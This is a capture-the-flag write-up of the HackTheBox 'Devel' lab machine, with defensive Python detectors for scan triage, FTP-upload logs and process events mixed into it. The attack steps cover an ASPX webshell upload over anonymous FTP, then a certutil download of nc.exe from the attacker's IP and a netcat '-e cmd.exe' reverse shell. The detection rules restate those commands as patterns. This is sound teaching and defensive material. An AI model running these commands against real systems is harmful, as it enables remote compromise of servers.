HackTheBox:Devel

Today we will take a look at HackTheBox: Devel. My goal in sharing this writeup is to show you the way if you get stuck. Please try to understand each step and take notes.

  • Network scan
# nmap -Pn -p- -sCV --open -oN nmap/open 10.10.10.5
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
80/tcp open http Microsoft IIS httpd 7.5
|_http-title: IIS7
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_ Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
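To triage scans like this one at scale, here is an added example (my own code, not from the original writeup) that parses nmap's normal (-oN) output and flags the two findings that matter on this host: anonymous FTP login (with the directory listing it exposes) and risky HTTP methods. The sample input is the scan output above embedded as a constructed string; the port-line and listing patterns are my own and assume the default -oN layout.

```python
import re

# Constructed sample: the nmap -oN output from the scan above, embedded inline.
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
80/tcp open http Microsoft IIS httpd 7.5
|_http-title: IIS7
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_ Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
"""

# One port line: "21/tcp open ftp Microsoft ftpd" (the version part may be empty).
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# One entry of the ftp-anon directory listing: "03-17-17 05:37PM 689 iisstart.htm".
LISTING_RE = re.compile(r"^\d{2}-\d{2}-\d{2}\s+\S+\s+(?:<DIR>|\d+)\s+(.+)$")


def parse_nmap(text):
    """Return one dict per port line; NSE script output is attached to the port it follows."""
    ports = []
    current = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {
                "port": int(m.group(1)),
                "proto": m.group(2),
                "state": m.group(3),
                "service": m.group(4),
                "version": m.group(5).strip(),
                "script_output": [],
            }
            ports.append(current)
        elif current is not None and line.startswith("|"):
            # Strip the "| " / "|_" tree prefix nmap draws in front of script lines.
            current["script_output"].append(line.lstrip("|_ ").rstrip())
    return ports


def ftp_listing(port):
    """Names exposed by the ftp-anon script, in the order nmap printed them."""
    names = []
    for line in port["script_output"]:
        m = LISTING_RE.match(line)
        if m:
            names.append(m.group(1).strip())
    return names


def triage(ports):
    """Turn parsed ports into (port, finding) pairs a reviewer should act on."""
    findings = []
    for p in ports:
        if p["state"] != "open":
            continue
        blob = "\n".join(p["script_output"])
        if p["service"] == "ftp" and "Anonymous FTP login allowed" in blob:
            listing = ", ".join(ftp_listing(p)) or "(empty)"
            findings.append((p["port"], "anonymous FTP login allowed; check whether uploads are "
                                        "permitted and whether the FTP root is also a web root. "
                                        f"Listing: {listing}"))
        m = re.search(r"Potentially risky methods:\s*(.+)", blob)
        if m:
            findings.append((p["port"], f"risky HTTP methods enabled: {m.group(1).strip()}"))
    return findings


if __name__ == "__main__":
    for port, msg in triage(parse_nmap(NMAP_OUTPUT)):
        print(f"[{port}] {msg}")
```

On this scan the FTP listing contains iisstart.htm and welcome.png, the default content of an IIS site, which is the hint that the anonymous FTP root and the web root are the same directory.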
  • Reverse Shell

The anonymous FTP listing contains iisstart.htm and welcome.png, the default content of the IIS site on port 80, so the FTP root is the web root and anything uploaded there is served by IIS. Let's upload a webshell.

# locate *aspx
# cp /usr/share/davtest/backdoors/aspx_cmd.aspx .
# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put aspx_cmd.aspx
local: aspx_cmd.aspx remote: aspx_cmd.aspx
229 Entering Extended Passive Mode (|||49158|)
150 Opening ASCII mode data connection.
100% |***********************************************************************************************************************************************************************************************| 1438 22.11 MiB/s --:-- ETA
226 Transfer complete.
1438 bytes sent in 00:00 (8.94 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||49159|)
125 Data connection already open; Transfer starting.
03-18-17 02:06AM <DIR> aspnet_client
07-26-22 12:26PM 1438 aspx_cmd.aspx
03-17-17 05:37PM 689 iisstart.htm
03-17-17 05:37PM 184946 welcome.png
226 Transfer complete.
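From the defender's side, this upload leaves a clear record in the IIS FTP service's W3C log. The following added example (my own code, not from the writeup) reads the #Fields: header so it works with whatever field order the server logs, then flags completed STOR commands that came from the anonymous account or wrote a script/executable extension. The log lines are constructed to mirror the session above, and the field set is an assumed subset of what IIS FTP logging offers.

```python
import os

# Constructed W3C-format FTP log mirroring the session above. The #Fields: header
# drives the parser, so a real log with more or reordered fields parses the same way.
FTP_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Version: 1.0
#Date: 2022-07-26 12:25:00
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status
2022-07-26 12:25:41 10.10.14.10 - 10.10.10.5 21 USER Anonymous 331 0
2022-07-26 12:25:43 10.10.14.10 Anonymous 10.10.10.5 21 PASS *** 230 0
2022-07-26 12:26:02 10.10.14.10 Anonymous 10.10.10.5 21 STOR aspx_cmd.aspx 226 0
2022-07-26 12:26:10 10.10.14.10 Anonymous 10.10.10.5 21 NLST - 226 0
2022-07-26 12:30:00 10.10.14.20 svc_deploy 10.10.10.5 21 STOR welcome.png 226 0
2022-07-26 12:31:05 10.10.14.30 Anonymous 10.10.10.5 21 RETR iisstart.htm 226 0
2022-07-26 12:32:00 10.10.14.40 Anonymous 10.10.10.5 21 STOR upload_test.asp 550 5
"""

# Extensions IIS will execute (or that are native executables) if they land in a web root.
EXECUTABLE_EXT = {".asp", ".aspx", ".ashx", ".asmx", ".exe", ".dll", ".ps1", ".bat"}


def parse_w3c(text):
    """Parse W3C extended log text into a list of dicts keyed by the #Fields: names."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields is not None:
            rows.append(dict(zip(fields, line.split())))
    return rows


def detect_uploads(rows):
    """Flag completed STOR commands that are anonymous, executable, or both."""
    hits = []
    for r in rows:
        if r.get("cs-method") != "STOR":
            continue
        if not r.get("sc-status", "").startswith("2"):
            continue  # 4xx/5xx: the server refused the upload, nothing landed on disk
        name = r.get("cs-uri-stem", "")
        ext = os.path.splitext(name)[1].lower()
        anonymous = r.get("cs-username", "").lower() == "anonymous"
        executable = ext in EXECUTABLE_EXT
        if anonymous or executable:
            hits.append({
                "time": f'{r.get("date")} {r.get("time")}',
                "client": r.get("c-ip"),
                "user": r.get("cs-username"),
                "file": name,
                # Anonymous *and* executable is the webshell case; either alone still merits a look.
                "severity": "high" if (anonymous and executable) else "medium",
            })
    return hits


if __name__ == "__main__":
    for h in detect_uploads(parse_w3c(FTP_LOG)):
        print(h)
```

The fix on the server side is the same whichever way the alert fires: disable anonymous write access, and never point an FTP site at a directory IIS executes from.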

The uploaded file is now served by IIS, so let's open the webshell in the browser.

Now create a temp folder, download nc.exe onto the box with certutil, start a listener on the attacking machine, and run nc.exe from the webshell.

cd c:\temp && certutil -urlcache -split -f http://10.10.14.10/nc.exe nc.exe
nc.exe 10.10.14.10 4444 -e cmd.exe
c:\temp\nc.exe 10.10.14.10 4444 -e cmd.exe
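On the host, every step of this chain leaves a process-creation trail: the IIS worker process w3wp.exe spawning cmd.exe, certutil fetching a file over HTTP, and nc.exe started with -e. The added example below (my own code, not part of the writeup) runs three such rules over constructed events shaped like Sysmon Event ID 1 records (Image, ParentImage, CommandLine). The event values are invented to match the commands above, and those three field names are the only assumption about the log source.

```python
import ntpath
import re

# Constructed process-creation events shaped like Sysmon Event ID 1 records.
EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": r'"cmd.exe" /c cd c:\temp && certutil -urlcache -split -f http://10.10.14.10/nc.exe nc.exe'},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil -urlcache -split -f http://10.10.14.10/nc.exe nc.exe"},
    {"Image": r"C:\temp\nc.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"c:\temp\nc.exe 10.10.14.10 4444 -e cmd.exe"},
    # Benign control: an admin hashing an installer from Explorer must not alert.
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"certutil -hashfile C:\Users\admin\Downloads\setup.msi SHA256"},
]

WEB_WORKERS = {"w3wp.exe", "php-cgi.exe", "httpd.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def basename(path):
    # ntpath handles Windows separators regardless of the platform the analysis runs on.
    return ntpath.basename(path).lower()


def rule_web_worker_spawns_shell(ev):
    """A web server worker should never be the parent of an interactive shell."""
    return basename(ev["ParentImage"]) in WEB_WORKERS and basename(ev["Image"]) in SHELLS


# certutil's cache/fetch switches combined with a URL: the LOLBin download pattern.
CERTUTIL_FETCH = re.compile(r"-urlcache.*\s-(f|split)\b.*https?://", re.I)


def rule_certutil_download(ev):
    return (basename(ev["Image"]) == "certutil.exe"
            and CERTUTIL_FETCH.search(ev["CommandLine"]) is not None)


# "-e <shell>" hands the shell a socket as stdin/stdout: the classic netcat reverse shell.
NETCAT_EXEC = re.compile(r"\s-e\s+\S*(cmd|powershell)(\.exe)?\b", re.I)


def rule_netcat_exec(ev):
    return NETCAT_EXEC.search(ev["CommandLine"]) is not None


RULES = {
    "web_worker_spawns_shell": rule_web_worker_spawns_shell,
    "certutil_download": rule_certutil_download,
    "netcat_exec": rule_netcat_exec,
}


def run_rules(events):
    """Return (rule_name, command_line) for every event that matches a rule."""
    alerts = []
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                alerts.append((name, ev["CommandLine"]))
    return alerts


if __name__ == "__main__":
    for name, cmd in run_rules(EVENTS):
        print(f"{name}: {cmd}")
```

The first rule is the one worth tuning least: a webshell has to execute its commands somehow, and w3wp.exe spawning cmd.exe or powershell.exe is rare enough on a healthy IIS host that it can alert on its own, before any download or callback happens.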
  • System

And now we are SYSTEM.

“If you have any questions or comments, please do not hesitate to write. Have a good day”

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good day.